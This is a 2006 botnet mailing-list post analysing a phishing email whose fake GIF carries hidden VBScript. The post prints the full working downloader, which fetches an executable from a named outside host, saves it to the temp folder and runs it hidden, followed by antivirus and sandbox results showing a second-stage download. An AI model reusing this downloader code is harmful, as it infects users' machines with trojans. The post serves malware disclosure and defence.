To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
This one was new to me. A gif that wasn't. Came via email. Link was
tohttp://lulavergonha.rg3.net which framed a gif
(http://mywebpage.netscape.com/lu7y7u/lula.gif) that firefox would
not deal with. DOes explorer reall open these?
Anyway, content of gif had javascript to download the maleware
(beware below is an active link as of this email):
<script language="VBScript">
on error resume next
' due to how ajax works, the file MUST be within the same local domain
dl = "http://mywebpage.netscape.com/lu7y7u/lula.cmd";
' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
' xml ajax req
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="pork.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
' open adodb stream and write contents of request to file
' like vbs dl exec code
S.write x.responseBody
' Saves it with CreateOverwrite flag
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
[ scan result ]
AntiVir 7.3.0.21/20061229 found [TR/Delphi.Downloader.Gen]
Authentium 4.93.8/20061229 found nothing
Avast 4.7.892.0/20061221 found nothing
AVG 386/20061229 found nothing
BitDefender 7.2/20061229 found [Trojan.Downloader.Banload.MG]
CAT-QuickHeal 8.00/20061229 found nothing
ClamAV devel-20060426/20061229 found nothing
DrWeb 4.33/20061229 found nothing
eSafe 7.0.14.0/20061228 found nothing
eTrust-InoculateIT 23.73.101/20061229 found nothing
eTrust-Vet 30.3.3289/20061229 found nothing
Ewido 4.0/20061229 found [Downloader.Delf.acn]
F-Prot 3.16f/20061229 found nothing
F-Prot4 4.2.1.29/20061229 found nothing
Fortinet 2.82.0.0/20061229 found nothing
Ikarus T3.1.0.27/20061229 found [Trojan-Downloader.Win32.Dadobra.CV]
Kaspersky 4.0.2.24/20061229 found nothing
McAfee 4928/20061228 found nothing
Microsoft 1.1904/20061227 found nothing
NOD32v2 1946/20061229 found [probably a variant of
Win32/TrojanDownloader.Banload.BAY]
Norman 5.80.02/20061229 found [W32/Downloader]
Panda 9.0.0.4/20061228 found [Suspicious file]
Prevx1 V2/20061229 found nothing
Sophos 4.13.0/20061228 found nothing
Sunbelt 2.2.907.0/20061218 found nothing
TheHacker 6.0.3.139/20061229 found nothing
UNA 1.83/20061228 found nothing
VBA32 3.11.1/20061229 found nothing
VirusBuster 4.3.19:9/20061229 found nothing
[ notes ]
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO:
[EMAIL PROTECTED] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH
PASSWORD)**.
* File length: 43520 bytes.
[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM32\imgrt.scr.
[ Network services ]
* Downloads file from
http://www.aquipodeserbom.xpg.com.br/firma01.bmp as
C:\WINDOWS\SYSTEM32\imgrt.scr.
[ Security issues ]
* Starting downloaded file - potential security problem.
--
Tom Shaw - Chief Engineer, OITC
<[EMAIL PROTECTED]>, http://www.oitc.com/
US Phone Numbers: 321-984-3714, 321-729-6258(fax),
321-258-2475(cell/voice mail,pager)
Text Paging: http://www.oitc.com/Pager/sendmessage.html
AIM/iChat: [EMAIL PROTECTED]
Google Talk: [EMAIL PROTECTED]
skype: trshaw
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
